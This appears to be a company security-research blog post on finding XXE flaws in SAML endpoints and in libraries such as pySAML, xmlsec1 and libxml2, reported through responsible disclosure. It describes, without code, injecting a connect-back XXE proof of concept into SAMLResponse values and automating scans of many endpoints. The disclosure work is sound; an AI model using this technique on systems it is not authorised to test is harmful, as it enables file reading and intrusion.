Down the SAML Code


Working for an identity company like Okta forces you to constantly be aware of new, old and obscure authentication methods — and also encourages you to dive deep into the underlying protocol to discover whether engineers have correctly implemented the technology. Okta’s Research & Exploitation Team does exactly that, by researching commonly used libraries, protocols and security methods. At Okta we work by the idea that security is not just about how good your code is — it’s about securing the destination services to which customers connect.


One of the most used technologies is SAML, and SAML is basically XML, so most developers build their applications using third-party XML Parsers or write their own to parse the SAML payloads. In either case, both could end up introducing security concerns. As we all know, XML is a rich protocol that can be exploited in several ways. For example, XML External Entity or XXE is a vulnerability that allows an attacker to load remote entities and read local files, among several other issues.

Back in August, we found that a vendor application we used was vulnerable to an XXE attack. After finding it, we created a proper write-up and followed up with the company's security team using our Responsible Vulnerability Disclosure process. At the same time, we asked ourselves, "If they are vulnerable, who else is vulnerable?"

Given the fact that most Java XXE vulnerabilities were reported back in 2013, we didn’t expect to find many security problems. Despite that, we wanted to retest all known SAML SP endpoints. Since I work for a cloud identity provider, we accessed our resources to get started — which included one of the biggest SAML integration lists in the world. While I had plenty of ACL endpoints to start my tests, Google queries helped as well.


We started by performing manual tests using a custom proxy and replacing the SAMLResponse with a simple Malicious XML. We did this by running the original response on a script that injects a PoC XXE that tries to connect back to an HTTP Server we were hosting. To our surprise, a few hours later, we had several new vulnerable services and appliances.

Manual testing got old very fast. MiTM each request and editing each SAMLResponse was not fun, and we soon realized we could automate this with a fake static response. The process went much faster after that.

At the same time we found that pySAML was vulnerable to XXE — but after carefully reviewing their code, we realized the problem was not in pySAML, but on one of the dependencies they were using to sign/unsign the code. XMLSEC1, a core library used in several other libraries, was susceptible to XXE.

We reported a vulnerability to the GitHub repository to get started, given a solution could be implemented at the python level. But the more we looked into the code, the more it seems that XMLSEC was responsible. This led us to create yet another vulnerability report. While generating the issue, we finally came to the conclusion that it was not entirely their fault. XMLSEC uses libXML, a core library from Gnome project. Even though that library already reported and fixed the problem with XXE, this was an undiscovered vulnerable path.

We reported the issue to XMLSEC, because we felt it was possible to find a solution at the XMLSEC layer, and they were responsible to correctly parse/filter this. A few hours later, the developer from XMLSEC created a ticket on libXML, and independently confirmed that the problem was indeed in libXML.

Final Thoughts

To recap: We not only found several vulnerable cloud applications but also found an XXE on a core library and several other SAML libraries (pySAML, xmlSEC, go-SAML, etc). This was an interesting bug we stumbled upon, and now it's your turn to use Github Gist Script to test your custom apps and 3rd party code and make the internet less vulnerable.

For more on this vulnerability discovery, please read my in-depth blog post.